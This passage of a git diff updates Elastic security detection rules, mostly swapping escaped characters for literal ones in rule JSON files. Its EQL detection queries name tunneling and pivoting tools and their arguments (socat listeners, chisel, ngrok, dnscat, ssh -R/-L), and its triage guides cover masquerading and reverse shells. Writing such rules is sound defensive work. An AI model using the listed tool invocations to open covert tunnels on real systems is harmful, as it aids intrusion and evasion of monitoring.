\"dns\" and\n network.direction : (\"outgoing\", \"egress\") and destination.ip !=\"::1\" and destination.ip !=\"127.0.0.1\"\n ]\n", "references": [ "https://twitter.com/SBousseaden/status/1235533224337641473", @@ -93,7 +93,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_106.json b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_106.json index 205d7465397..1def50ecd67 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_106.json +++ b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_106.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Windows Error Manager Masquerading", - "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [process where host.os.type == \"windows\" and event.type:\"start\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and destination.ip !=\"::1\" and destination.ip !=\"127.0.0.1\"\n ]\n", "references": [ "https://twitter.com/SBousseaden/status/1235533224337641473", @@ -93,7 +93,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_104.json b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_104.json index c5461dfe571..8b68eb3bf4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_104.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_105.json b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_105.json index 4033e027a2b..7e4c34cf7e7 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_105.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_106.json b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_106.json index fcf242aa12f..8343d47337c 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_106.json +++ b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_106.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_107.json b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_107.json index 0ba525a93bf..d10beca8c62 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_107.json +++ b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_107.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_108.json b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_108.json index 6041ca0f00b..f0151a07802 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_108.json +++ b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_108.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_109.json b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_109.json index 9953283c588..d9733bb8293 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_109.json +++ b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_109.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_1.json b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_1.json index f24c3e2e60f..0f49a15e396 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_1.json +++ b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_1.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Tunneling and/or Port Forwarding", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and ((\n// gost \u0026 pivotnacci - spawned without process.parent.name\n(process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n// ssh\n(process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count \u003e= 4)) or\n// sshuttle\n(process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count \u003e= 4) or\n// socat\n(process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and process.args_count \u003e= 3) or\n// chisel\n(process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n// iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy \u0026 ngrok \n(process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"))\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and ((\n// gost & pivotnacci - spawned without process.parent.name\n(process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n// ssh\n(process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count >= 4)) or\n// sshuttle\n(process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count >= 4) or\n// socat\n(process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and process.args_count >= 3) or\n// chisel\n(process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n// iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok \n(process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"))\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_2.json b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_2.json index febc75dd6da..fc93c65df9b 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_2.json +++ b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_2.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Tunneling and/or Port Forwarding", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and ((\n // gost \u0026 pivotnacci - spawned without process.parent.name\n (process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n // ssh\n (process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count \u003e= 4 and \n not process.args : \"chmod\")) or\n // sshuttle\n (process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count \u003e= 4) or\n // socat\n (process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and process.args_count \u003e= 3) or\n // chisel\n (process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy \u0026 ngrok \n (process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n ) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n)\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and ((\n // gost & pivotnacci - spawned without process.parent.name\n (process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n // ssh\n (process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count >= 4 and \n not process.args : \"chmod\")) or\n // sshuttle\n (process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count >= 4) or\n // socat\n (process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and process.args_count >= 3) or\n // chisel\n (process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok \n (process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n ) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n)\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_3.json b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_3.json index 28ad8f2c8e4..9e182639948 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_3.json +++ b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_3.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Tunneling and/or Port Forwarding", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and ((\n // gost \u0026 pivotnacci - spawned without process.parent.name\n (process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n // ssh\n (process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count \u003e= 4 and \n not process.args : \"chmod\")) or\n // sshuttle\n (process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count \u003e= 4) or\n // socat\n (process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and process.args_count \u003e= 3) or\n // chisel\n (process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy \u0026 ngrok \n (process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n ) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n)\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and ((\n // gost & pivotnacci - spawned without process.parent.name\n (process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n // ssh\n (process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count >= 4 and \n not process.args : \"chmod\")) or\n // sshuttle\n (process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count >= 4) or\n // socat\n (process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and process.args_count >= 3) or\n // chisel\n (process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok \n (process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n ) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n)\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_1.json index ab852ae86e4..048e4b97e05 100644 --- a/packages/security_detection_engine/kibana/security_rule/6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_1.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_203.json b/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_203.json index c56c368f1ef..1e0e4366ff6 100644 --- a/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_203.json +++ b/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_203.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_204.json b/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_204.json index e0ac47ad6ac..424dd774aeb 100644 --- a/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_204.json +++ b/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_204.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_205.json b/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_205.json index 5718d89b72e..309d1f015fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_205.json +++ b/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_205.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_105.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_105.json index e2ffbc407ed..ff15ccca964 100644 --- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_105.json +++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense 